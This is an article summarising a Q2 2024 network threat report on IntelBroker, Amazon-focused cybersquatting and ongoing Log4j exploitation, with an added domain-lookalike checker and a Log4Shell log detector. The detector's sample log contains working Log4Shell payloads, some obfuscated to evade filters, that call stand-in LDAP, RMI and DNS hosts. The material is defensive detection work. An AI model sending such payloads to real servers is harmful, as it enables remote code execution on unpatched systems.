Cato CTRL (Cyber Threats Research Lab) released its Cato CTRL SASE Threat Report Q2 2024. The report highlights key findings based on an analysis of a staggering 1.38 trillion network flows across more than 2,500 Cato clients worldwide between April and June 2024.
Highlights from the Q2 2024 Cato CTRL SASE Threat Report
The report is built on analysis of network traffic data rather than survey responses. Three findings that matter most to businesses are as follows.
1) IntelBroker: A constant threat in the cyber underground
During an in-depth investigation of hacker communities and the dark web, Cato CTRL identified a notorious threat actor known as IntelBroker. IntelBroker is a prominent figure and moderator in the BreachForums hacker community and has been heavily involved in selling data and source code stolen from large organizations, including AMD, Apple, Facebook, KrypC, Microsoft, Space-Eyes, T-Mobile and the US Army Aviation and Missile Command.
2) 66% of brand spoofing is focused on Amazon
Cybersquatting is registering and using a domain name that imitates a brand's name or registered trademark in order to profit from it, typically through phishing, malware delivery or ad fraud. The report found that Amazon was the most frequently spoofed brand, with 66% of such domains targeting the retail giant. Google was a distant second at 7%.
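As an added example that is not part of the Cato CTRL report, the checker below flags the kinds of cybersquatting domains the report counts: brand-in-domain registrations (amazon-account-verify.com), typosquats one edit away (amazn.com), lookalike characters (amaz0n.net, Cyrillic letters) and brand names hidden in a subdomain (amazon.com.secure-update.xyz). The brand watchlist, the allowlist of legitimate domains, the substitution tables and the sample domains are all constructed for illustration; it goes slightly beyond the text by covering several lookalike techniques in one pass.

```python
"""Heuristic cybersquatting / lookalike-domain checker (added example)."""

PROTECTED_BRANDS = ["amazon", "google", "microsoft"]       # assumption: your watchlist
LEGITIMATE_DOMAINS = {"amazon.com", "google.com", "microsoft.com"}  # assumption

# Visually confusable characters attackers substitute for Latin letters.
# Cyrillic a, e, o, p, c, y, x, i -> Latin (assumption: small subset of confusables).
CYRILLIC_LOOKALIKES = str.maketrans({
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p",
    "\u0441": "c", "\u0443": "y", "\u0445": "x", "\u0456": "i",
})
# ASCII substitutions; "rn"->"m" and "vv"->"w" also hit innocent words,
# so treat every match as a lead for an analyst, not a verdict.
ASCII_SUBSTITUTIONS = [("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"), ("3", "e"), ("5", "s")]


def normalize(label: str) -> str:
    """Fold a DNS label to the ASCII string a victim would read it as."""
    if label.startswith("xn--"):                 # punycode-encoded IDN label
        try:
            label = label.encode("ascii").decode("idna")
        except UnicodeError:
            pass
    label = label.lower().translate(CYRILLIC_LOOKALIKES)
    for src, dst in ASCII_SUBSTITUTIONS:
        label = label.replace(src, dst)
    return label


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance; catches single-character typosquats."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(domain: str, brands=PROTECTED_BRANDS, allowlist=LEGITIMATE_DOMAINS):
    """Return (brand, reason) if the domain looks like it squats on a brand, else None.

    Simplification: the registrable name is taken as the last two labels, so
    two-level public suffixes such as co.uk are not handled; real code should
    use the Public Suffix List.
    """
    labels = domain.lower().rstrip(".").split(".")
    if len(labels) < 2:
        return None
    registrable = ".".join(labels[-2:])
    if registrable in allowlist:
        return None                              # the brand's own domain
    label = normalize(labels[-2])
    subdomains = [normalize(l) for l in labels[:-2]]
    for brand in brands:
        if brand in label:                       # amazon-login.com, amaz0n.net
            return (brand, "brand-in-label")
        if edit_distance(label, brand) <= 1:     # amazn.com, amazom.com
            return (brand, "typosquat")
        if any(brand in s for s in subdomains):  # amazon.com.evil-host.xyz
            return (brand, "brand-in-subdomain")
    return None


def scan(domains):
    """Apply classify() to a list of candidate domains; return only the hits."""
    hits = []
    for d in domains:
        verdict = classify(d)
        if verdict:
            hits.append((d, verdict[0], verdict[1]))
    return hits


# Constructed sample input, e.g. from newly registered domain feeds or passive DNS.
SAMPLE_DOMAINS = [
    "amazon.com",                      # legitimate, allowlisted
    "amazon-account-verify.com",       # brand embedded in the registered name
    "amaz0n.net",                      # digit-for-letter lookalike
    "amazn.com",                       # missing letter
    "\u0430mazon.com",                 # leading Cyrillic 'a'
    "amazon.com.secure-update.xyz",    # brand as subdomain of an unrelated name
    "amazing-deals.com",               # benign, shares a prefix only
    "g00gle.com",
    "login-microsoft-support.com",
]

if __name__ == "__main__":
    for domain, brand, reason in scan(SAMPLE_DOMAINS):
        print(f"{domain:32} -> {brand:10} {reason}")
```

Feed it newly registered domains or certificate-transparency entries rather than your own traffic; the point is to spot the spoof before the phishing campaign that uses it reaches users.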
3) Log4j is still being exploited
Although the Log4j vulnerability (CVE-2021-44228, Log4Shell) was disclosed in 2021, it remains a favorite target for threat actors. Between Q1 and Q2 2024, Cato CTRL recorded a 61% increase in Log4j exploit attempts in inbound traffic and a 79% increase in WAN traffic. Similarly, an Oracle WebLogic vulnerability first disclosed in 2020 saw a 114% increase in exploit attempts in WAN traffic over the same period.
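The exploit attempts the report counts are easy to recognise in web server logs once the attacker's obfuscation is undone. As an added example that is not from the Cato CTRL report, the detector below URL-decodes each request line, collapses Log4j lookup tricks (`${lower:j}`, `${upper:N}` and the `${x:-y}` default-value syntax that attackers use to spell out `jndi` one letter at a time), and then looks for a `jndi:` lookup with a remote-fetch scheme. The Apache-style log lines, the 198.51.100.x addresses and the example.net hostname are constructed for illustration.

```python
"""Log4Shell (CVE-2021-44228) exploit-attempt detector over web logs (added example)."""
import re
from urllib.parse import unquote

# An innermost ${...} lookup: braces with no nested "${" inside.
_INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# Schemes that make JNDI reach out to an attacker-controlled server.
_JNDI = re.compile(r"jndi:(ldaps?|rmi|dns|iiop|corba|nds|http)", re.IGNORECASE)


def _resolve(match: re.Match) -> str:
    """Evaluate one lookup the way Log4j 2 would, as far as detection needs."""
    body = match.group(1)
    if ":-" in body:                      # ${env:NOPE:-j} or ${::-j} -> "j"
        return body.split(":-", 1)[1]
    key, _, arg = body.partition(":")
    if key.lower() == "lower":            # ${lower:J} -> "j"
        return arg.lower()
    if key.lower() == "upper":            # ${upper:n} -> "N"
        return arg.upper()
    # Any other lookup (jndi, sys, env, ...): keep the body text so a
    # "jndi:..." payload survives for matching. Real Log4j would execute it.
    return body


def deobfuscate(s: str, max_rounds: int = 10) -> str:
    """URL-decode, then resolve nested lookups inside-out until stable."""
    s = unquote(s)
    for _ in range(max_rounds):           # bounded: attackers nest deeply
        resolved = _INNER_LOOKUP.sub(_resolve, s)
        if resolved == s:
            break
        s = resolved
    return s


def scan(lines):
    """Return (line_number, source_ip, jndi_scheme) for each suspicious line."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = _JNDI.search(deobfuscate(line))
        if m:
            hits.append((n, line.split(" ", 1)[0], m.group(1).lower()))
    return hits


# Constructed sample: Apache combined log format, payloads in URL and User-Agent.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Jun/2024:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [12/Jun/2024:10:01:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [12/Jun/2024:10:01:09 +0000] "GET /?x=${${lower:j}ndi:${lower:r}mi://198.51.100.7:1099/b} HTTP/1.1" 400 0 "-" "curl/8.0"',
    '10.0.0.9 - - [12/Jun/2024:10:01:12 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://198.51.100.7:1389/c}"',
    '10.0.0.9 - - [12/Jun/2024:10:01:15 +0000] "GET /?q=%24%7Bjndi%3Adns%3A%2F%2Fexfil.example.net%2Fd%7D HTTP/1.1" 200 10 "-" "python-requests/2.31"',
    '10.0.0.12 - - [12/Jun/2024:10:02:00 +0000] "GET /docs/${version} HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for n, ip, scheme in scan(SAMPLE_LOG):
        print(f"line {n}: {ip} sent a jndi:{scheme} lookup")
```

A hit in the logs is an attempt, not a compromise; whether it succeeded depends on a vulnerable Log4j 2 (2.0-beta9 to 2.14.1) actually logging that field, which is why the report's rising attempt counts argue for patching rather than for relying on the WAF alone. The `dns` scheme is worth keeping in the list: attackers use it to confirm a target is vulnerable before sending the real `ldap` payload.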
Security recommendations
Based on the report’s findings, Cato CTRL advises organizations to adopt the following best practices:
- Regularly monitor dark web forums and marketplaces for any mention of selling your company’s data or credentials.
- Use tools and techniques to detect and combat phishing and other attacks that rely on cybersquatting.
- Create a proactive patching schedule focused on critical vulnerabilities, especially those actively targeted by threat actors such as Log4j.
- Create a step-by-step data breach response plan.
- Adopt an "assume breach" mentality, backed by techniques such as ZTNA, XDR, penetration testing and more.
- Develop an AI governance strategy.
The full report contains additional guidance and the detail behind each finding.